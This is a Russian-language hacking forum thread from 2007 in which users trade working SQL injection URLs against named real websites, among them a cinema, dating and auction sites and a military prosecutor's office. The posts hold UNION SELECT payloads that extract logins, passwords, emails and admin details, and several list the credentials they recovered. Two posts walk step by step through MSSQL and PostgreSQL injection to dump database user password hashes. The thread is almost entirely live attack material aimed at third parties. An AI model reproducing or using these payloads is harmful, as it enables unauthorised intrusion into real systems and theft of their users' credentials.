http://www.kino-ukraina.com.ua/news/?nid=-1'+UNION+SELECT+1,2,3,concat_ws(0x3a,login,%20pwd) ,5,6+FROM+cin.Users/*
вот ток где тут админка, я не знаю...
http://www.alturspro.ru/index.php?page=99999'+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16/* не могу подобрать таблицы кто поможет просто для интереса какие там таблицы есть
есть таблица admin,колонки с паролем не нашел.
интересная скуля,вот только колонку с паролями, подобрать не смог:(
код:
http://date.inter.by/anketa.php?id=-8872'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,name ,14,ID,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,icq+from+users/* может кто подберет,а?
Red_Red1
07.10.2007, 14:08
есть таблица admin,колонки с паролем не нашел
http://www.alturspro.ru/index.php?page=99999'+UNION+SELECT+1,2,3,4,5,6,7,8 ,AES_DECRYPT(AES_ENCRYPT(pass,%20%200x71),0x71),10 ,11,12,13,14,15,16%20from%20admin/*
2 fobofob
Может ты это нашел? Ну короче это к анкетам
http://date.inter.by/anketa.php?id=-8872'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,pas s,login,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50+from+members/*
Гомельская межгарнизонная Военная Прокуратура
код:
http://www.mvp.gomel.by/news.php?id=-87+union+select+1,concat(user(),0x3a,database()),3 ,4,version(),6,7/* :cool:
http://socketmailsolutions.com/showcase/index.php?action=readmore&id=5-1%20union%20select%200,1,concat(email,char(58),use rid,0x3a,adminid),3%20from%20admin/*
http://sohotemplates.com/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid, 0x3a,adminid),3%20from%20admin/*
http://www.covantagetemplates.com/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid, 0x3a,adminid),3%20from%20admin/*
пароль 123456
http://www.seksbilgileri.com/kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar
юзер ADMIN
http://www.seksbilgileri.com/kategori.asp?kat=goster&id=1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
пароль ADMIN
http://www.demirkandemir.com/kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7+from+ayar
пароль ADMIN
http://www.demirkandemir.com/kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7+from+ayar
Инет Аукцион:wink:
код:
http://www.kip.by/auctiondetails.php?id=-100343'+union+select+1,concat_ws(0x3a,version(),us er(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*
четвертый мускул...
http://www.o3may.info/news.php?page=viewnews&journal=3&id=-55'+union+select+concat_ws(0x3a,user(),version(),d atabase())/*
BlackCats
08.10.2007, 01:21
моя первая инъекция в MSSQL
нашёл:
http://www.asprilexi.com/games_cat.asp?id=1'
проверил:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=@@version--
схема таблес:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES)--
выбрал табличку.. лень было искать реальное чтобибудь типа "users" так что выбрал просто не ту что сначала.
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('kartasub','cyfd','dtproperties','erevna','st atic','sysconstraints','syssegments','var','ahcmd' ,'anikei','apostoli','banner','cardview','choice', 'comd_list','D99_CMD'))--
колонки:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+COLUMN_NAME+ FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=' D99_REG'+AND+COLUMN_NAME+NOT+IN+('data'))--
вывод:
http://www.asprilexi.com/games_cat.asp?id=1+or+1=(SELECT+TOP+1+data+from+D9 9_REG)--
какойто хз какой язык, поэтому нихрена непонятно.. ну и фик с ним)
BlackCats
08.10.2007, 15:49
моя первая инъекция в PostgreSQL
сам сайт мне дал ещё давно Constantine поэтому даже если боян, прошу не ругать.. просто это был самый короткий путь попробывать свои силы
нашёл:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=1'
столбцы:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+1,null,null,null,null,null--
схема.таблес
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,TABLE_NAME,null,null,null,null +from+information_schema.tables--
хоть еденичка выводится в 1 всёравно table_name мы поставляем в 2.. ибо в 1 другой тип данных.
выбрали табличку: pg_user
выводим колонки:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,COLUMN_NAME,null,null,null,nul l+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME =chr(112)||chr(103)||chr(95)||chr(117)||chr(115)|| chr(101)||chr(114)--
перевели в char ибо подругому нерааботет(в данном случае) :)
получаем:
passwd
usecatupd
useconfig
usecreatedb
usename
usesuper
usesysid
valuntil
выводим:
usename:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename,null,null,null,null+fr om+pg_user--
passwd
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,passwd,null,null,null,null+fro m+pg_user--
объеденим:
http://www.chroniclejournal.com/includes/datafiles/obits_results.php?id=-1+union+select+null,usename||chr(58)||passwd,null, null,null,null+from+pg_user--
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot